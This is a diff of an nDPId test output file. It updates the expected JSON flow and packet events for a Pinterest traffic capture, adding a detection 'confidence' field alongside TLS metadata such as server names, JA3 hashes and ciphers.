 00613{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14612,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289717548,"flow_last_seen":1605289717548,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1605289717548,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::200d","src_port":40894,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14612,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1605289717548,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605289717548,"pkt":"qtsDr8lk5EKm5WPyht1gD67DACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIFgAAAAAAACANn74Bu+7PaD4AAAAAoAL9ID+FAAACBAWgBAIICjGG9eUAAAAAAQMDBw=="}
 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14613,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1605289717572,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605289717572,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgWAAAAAAAAIA0qAcsBIEmLB5kd7IUo3\/YpAbufvovR75juz2g\/oBJXgHfiAAACBAV4AQMDAwQCCArCuS86MYb15Q=="}
 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14614,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1605289717572,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"ts_msec":1605289717572,"pkt":"qtsDr8lk5EKm5WPyht1gD67DACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIFgAAAAAAACANn74Bu+7PaD+L0e+ZgBAB+\/vbAAABAQgKMYb1\/cK5Lzo="}
-00926{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":14615,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289717548,"flow_last_seen":1605289717572,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605289717572,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::200d","src_port":40894,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"accounts.google.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-00967{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":14617,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289717548,"flow_last_seen":1605289717605,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"ts_msec":1605289717605,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::200d","src_port":40894,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"accounts.google.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00952{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":14615,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289717548,"flow_last_seen":1605289717572,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605289717572,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::200d","src_port":40894,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"accounts.google.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00993{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":14617,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289717548,"flow_last_seen":1605289717605,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"ts_msec":1605289717605,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::200d","src_port":40894,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"accounts.google.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 00606{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14833,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289718346,"flow_last_seen":1605289718346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605289718346,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::720","src_port":56940,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14833,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1605289718346,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"ts_msec":1605289718346,"pkt":"qtsDr8lk5EKm5WPyht1gDn7LACAGQCoBywEgSYsHmR3shSjf9ikqBE5CAB0AAAAAAAAAAAcg3mwBu1MbKQQ2nwhTgBBf5ZGnAAABAQgKdGByysK4e5A="}
 00613{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14834,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289718347,"flow_last_seen":1605289718347,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605289718347,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2003","src_port":51472,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -170,72 +170,72 @@
 00506{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15691,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1605289732972,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605289732972,"pkt":"qtsDr8lk5EKm5WPyht1gD7s\/ACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICgAAAAAAACAOsEYBuwu8HIoAAAAAoAL9IMybAAACBAWgBAIIClhuYDIAAAAAAQMDBw=="}
 00506{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15845,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1605289733005,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605289733005,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoETkIAHQAAAAAAAAAAAIQqAcsBIEmLB5kd7IUo3\/YpAbuWkkELYhojTae5oBJXgL46AAACBAV4AQMDAwQCCArCuWtz1mJphA=="}
 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15850,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":3,"flow_last_seen":1605289733005,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"ts_msec":1605289733005,"pkt":"qtsDr8lk5EKm5WPyht1gBE+4ACAGQCoBywEgSYsHmR3shSjf9ikqBE5CAB0AAAAAAAAAAACElpIBuyNNp7lBC2IbgBAB+0IeAAABAQgK1mJpssK5a3M="}
-00925{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15854,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289732959,"flow_last_seen":1605289733006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605289733006,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38546,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"assets.pinterest.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00951{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15854,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289732959,"flow_last_seen":1605289733006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605289733006,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38546,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"assets.pinterest.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15960,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":1605289733019,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605289733019,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgKAAAAAAAAIA4qAcsBIEmLB5kd7IUo3\/YpAbuwRmgG99MLvByLoBJXgOQ\/AAACBAV4AQMDAwQCCArCuWuDWG5gMg=="}
 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15964,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":3,"flow_last_seen":1605289733019,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"ts_msec":1605289733019,"pkt":"qtsDr8lk5EKm5WPyht1gD7s\/ACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICgAAAAAAACAOsEYBuwu8HItoBvfUgBAB+2giAAABAQgKWG5gYcK5a4M="}
-00941{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15967,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289732972,"flow_last_seen":1605289733019,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605289733019,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200e","src_port":45126,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.google-analytics.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-00981{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16214,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289732959,"flow_last_seen":1605289733059,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"ts_msec":1605289733059,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38546,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"assets.pinterest.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-02762{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16230,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1605289732959,"flow_last_seen":1605289733060,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5839,"flow_avg_l4_payload_len":530,"midstream":0,"ts_msec":1605289733060,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38546,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"assets.pinterest.com","server_names":"*.pinterest.com,pinterest.in,*.pinterest.co,pinterest.co,*.pinterest.pe,pinterest.pe,*.pinterest.be,pinterest.be,*.pinterest.in,*.pinterest.ph,*.pinterest.ec,pinterest.ph,*.pinterest.cl,*.pinimg.com,*.pinterest.es,pinterest.es,*.pinterest.nz,pinterest.nz,pinterest.ec,pinterest.hu,pinterest.ca,pinterest.id,*.pinterest.nl,pinterest.nl,*.pinterest.tw,pinterest.tw,*.pinterest.th,pinterest.th,*.pinterest.id,*.pinterest.vn,*.pinterest.hu,pinterest.vn,*.pinterest.uk,pinterest.uk,*.pinterest.ru,pinterest.ru,*.pinterest.it,pinterest.it,pinterest.fr,pinterest.cl,*.pinterest.fr,*.pinterest.jp,*.pinterest.ca,pinterest.com,pin.it,*.pinterest.se,*.pinterest.pt,*.pinterest.mx,*.pinterest.kr,*.pinterest.ie,pinterest.engineering,*.pinterest.dk,*.pinterest.de,*.pinterest.ch,*.pinterest.at,*.pinterestmail.com,*.pinterest.engineering,*.pinterest.info,pinterest.info,pinimg.com,pinterestmail.com,pinterest.de,pinterest.dk,pinterest.ie,pinterest.jp,pinterest.kr,pinterest.mx,pinterest.pt,pinterest.se,pinterest.at,pinterest.ch,pinterest.co.at,*.pinterest.com.uy,pinterest.co.kr,pinterest.co.uk,*.pinterest.com.au,pinterest.com.au,pinterest.com.mx,*.pinterest.co.nz,pinterest.co.nz,pinterest.com.pe,pinterest.com.uy,*.pinterest.co.in,pinterest.com.py,*.pinterest.com.py,pinterest.com.bo,*.pinterest.com.bo,pinterest.com.ec,*.pinterest.com.ec,pinterest.co.in,*.pinterest.com.pe,*.pinterest.com.mx,pinterest.com.vn,*.pinterest.com.vn,*.pinterest.co.uk,*.pinterest.co.kr,*.pinterest.co.at,*.testing.pinterest.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Pinterest, Inc., CN=*.pinterest.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"1E:D0:5D:9F:0D:82:46:B3:60:5F:11:FB:64:D5:28:35:37:40:7A:4E"}}
-00982{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16506,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289732972,"flow_last_seen":1605289733177,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"ts_msec":1605289733177,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200e","src_port":45126,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.google-analytics.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00967{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15967,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289732972,"flow_last_seen":1605289733019,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605289733019,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200e","src_port":45126,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.google-analytics.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+01007{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16214,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289732959,"flow_last_seen":1605289733059,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"ts_msec":1605289733059,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38546,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"assets.pinterest.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+02788{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16230,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1605289732959,"flow_last_seen":1605289733060,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5839,"flow_avg_l4_payload_len":530,"midstream":0,"ts_msec":1605289733060,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38546,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"assets.pinterest.com","server_names":"*.pinterest.com,pinterest.in,*.pinterest.co,pinterest.co,*.pinterest.pe,pinterest.pe,*.pinterest.be,pinterest.be,*.pinterest.in,*.pinterest.ph,*.pinterest.ec,pinterest.ph,*.pinterest.cl,*.pinimg.com,*.pinterest.es,pinterest.es,*.pinterest.nz,pinterest.nz,pinterest.ec,pinterest.hu,pinterest.ca,pinterest.id,*.pinterest.nl,pinterest.nl,*.pinterest.tw,pinterest.tw,*.pinterest.th,pinterest.th,*.pinterest.id,*.pinterest.vn,*.pinterest.hu,pinterest.vn,*.pinterest.uk,pinterest.uk,*.pinterest.ru,pinterest.ru,*.pinterest.it,pinterest.it,pinterest.fr,pinterest.cl,*.pinterest.fr,*.pinterest.jp,*.pinterest.ca,pinterest.com,pin.it,*.pinterest.se,*.pinterest.pt,*.pinterest.mx,*.pinterest.kr,*.pinterest.ie,pinterest.engineering,*.pinterest.dk,*.pinterest.de,*.pinterest.ch,*.pinterest.at,*.pinterestmail.com,*.pinterest.engineering,*.pinterest.info,pinterest.info,pinimg.com,pinterestmail.com,pinterest.de,pinterest.dk,pinterest.ie,pinterest.jp,pinterest.kr,pinterest.mx,pinterest.pt,pinterest.se,pinterest.at,pinterest.ch,pinterest.co.at,*.pinterest.com.uy,pinterest.co.kr,pinterest.co.uk,*.pinterest.com.au,pinterest.com.au,pinterest.com.mx,*.pinterest.co.nz,pinterest.co.nz,pinterest.com.pe,pinterest.com.uy,*.pinterest.co.in,pinterest.com.py,*.pinterest.com.py,pinterest.com.bo,*.pinterest.com.bo,pinterest.com.ec,*.pinterest.com.ec,pinterest.co.in,*.pinterest.com.pe,*.pinterest.com.mx,pinterest.com.vn,*.pinterest.com.vn,*.pinterest.co.uk,*.pinterest.co.kr,*.pinterest.co.at,*.testing.pinterest.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Pinterest, Inc., CN=*.pinterest.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"1E:D0:5D:9F:0D:82:46:B3:60:5F:11:FB:64:D5:28:35:37:40:7A:4E"}}
+01008{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16506,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289732972,"flow_last_seen":1605289733177,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"ts_msec":1605289733177,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200e","src_port":45126,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.google-analytics.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 00607{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":17592,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289733399,"flow_last_seen":1605289733399,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1605289733399,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7a6e","src_port":40114,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17592,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1605289733399,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605289733399,"pkt":"qtsDr8lk5EKm5WPyht1gBe6sACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXpunLIBuwBxlgkAAAAAoAL9IKzvAAACBAWgBAIICsW6TI0AAAAAAQMDBw=="}
 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17595,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":1605289733420,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605289733420,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdlem4qAcsBIEmLB5kd7IUo3\/YpAbucsmOjoioAcZYKoBJXgB0AAAACBAV4AQMDAwQCCArCuW0jxbpMjQ=="}
